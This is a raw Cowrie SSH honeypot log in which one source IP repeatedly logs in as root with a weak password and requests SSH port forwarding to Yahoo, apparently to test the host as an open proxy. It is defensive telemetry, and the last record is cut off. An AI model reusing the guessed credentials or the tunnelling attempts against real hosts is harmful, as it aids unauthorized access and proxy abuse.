{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52741,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dc0f7804c35","protocol":"ssh","message":"New connection: 213.209.150.239:52741 (1.2.3.4:22) [session: 8dc0f7804c35]","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.112384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.113290Z","src_ip":"213.209.150.239","session":"8dc0f7804c35"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.170010Z","src_ip":"213.209.150.239","session":"8dc0f7804c35"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.452502Z","src_ip":"213.209.150.239","session":"8dc0f7804c35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":27860,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27860","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.510108Z","session":"8dc0f7804c35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.566828Z","src_ip":"213.209.150.239","session":"8dc0f7804c35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":19482,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19482","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.723032Z","session":"8dc0f7804c35"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.753101Z","src_ip":"212.227.125.160","session":"eeb1433d5b7f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.779580Z","src_ip":"213.209.150.239","session":"8dc0f7804c35"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.837299Z","src_ip":"213.209.150.239","session":"8dc0f7804c35"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52838,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c96b549810f","protocol":"ssh","message":"New connection: 213.209.150.239:52838 (1.2.3.4:22) [session: 6c96b549810f]","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.883332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.884217Z","src_ip":"213.209.150.239","session":"6c96b549810f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:21.931176Z","src_ip":"213.209.150.239","session":"6c96b549810f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.166507Z","src_ip":"213.209.150.239","session":"6c96b549810f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":8071,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8071","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.214773Z","session":"6c96b549810f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.262130Z","src_ip":"213.209.150.239","session":"6c96b549810f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":19650,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:19650","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.397673Z","session":"6c96b549810f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.445072Z","src_ip":"213.209.150.239","session":"6c96b549810f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.493603Z","src_ip":"213.209.150.239","session":"6c96b549810f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52906,"dst_ip":"1.2.3.4","dst_port":22,"session":"077c4ca4ed71","protocol":"ssh","message":"New connection: 213.209.150.239:52906 (1.2.3.4:22) [session: 077c4ca4ed71]","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.549133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.550159Z","src_ip":"213.209.150.239","session":"077c4ca4ed71"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.607034Z","src_ip":"213.209.150.239","session":"077c4ca4ed71"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.891100Z","src_ip":"213.209.150.239","session":"077c4ca4ed71"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":11729,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11729","sensor":"my-vps","timestamp":"2025-08-26T01:08:22.948849Z","session":"077c4ca4ed71"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.006181Z","src_ip":"213.209.150.239","session":"077c4ca4ed71"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":3523,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:3523","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.163213Z","session":"077c4ca4ed71"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.219969Z","src_ip":"213.209.150.239","session":"077c4ca4ed71"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.277559Z","src_ip":"213.209.150.239","session":"077c4ca4ed71"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53003,"dst_ip":"1.2.3.4","dst_port":22,"session":"08d8485c7471","protocol":"ssh","message":"New connection: 213.209.150.239:53003 (1.2.3.4:22) [session: 08d8485c7471]","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.323799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.324696Z","src_ip":"213.209.150.239","session":"08d8485c7471"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.371767Z","src_ip":"213.209.150.239","session":"08d8485c7471"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.607772Z","src_ip":"213.209.150.239","session":"08d8485c7471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":22428,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:22428","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.655978Z","session":"08d8485c7471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.703310Z","src_ip":"213.209.150.239","session":"08d8485c7471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":29058,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29058","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.837616Z","session":"08d8485c7471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.885000Z","src_ip":"213.209.150.239","session":"08d8485c7471"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.932934Z","src_ip":"213.209.150.239","session":"08d8485c7471"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53080,"dst_ip":"1.2.3.4","dst_port":22,"session":"44df09ee81b3","protocol":"ssh","message":"New connection: 213.209.150.239:53080 (1.2.3.4:22) [session: 44df09ee81b3]","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.988655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:23.989450Z","src_ip":"213.209.150.239","session":"44df09ee81b3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:24.046654Z","src_ip":"213.209.150.239","session":"44df09ee81b3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:24.329052Z","src_ip":"213.209.150.239","session":"44df09ee81b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":20097,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20097","sensor":"my-vps","timestamp":"2025-08-26T01:08:24.386925Z","session":"44df09ee81b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:24.443941Z","src_ip":"213.209.150.239","session":"44df09ee81b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":21357,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:21357","sensor":"my-vps","timestamp":"2025-08-26T01:08:24.599108Z","session":"44df09ee81b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:24.655879Z","src_ip":"213.209.150.239","session":"44df09ee81b3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:24.713974Z","src_ip":"213.209.150.239","session":"44df09ee81b3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58435,"dst_ip":"1.2.3.4","dst_port":22,"session":"4de7b51e555a","protocol":"ssh","message":"New connection: 213.209.150.239:58435 (1.2.3.4:22) [session: 4de7b51e555a]","sensor":"my-vps","timestamp":"2025-08-26T01:08:25.546126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:25.547214Z","src_ip":"213.209.150.239","session":"4de7b51e555a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01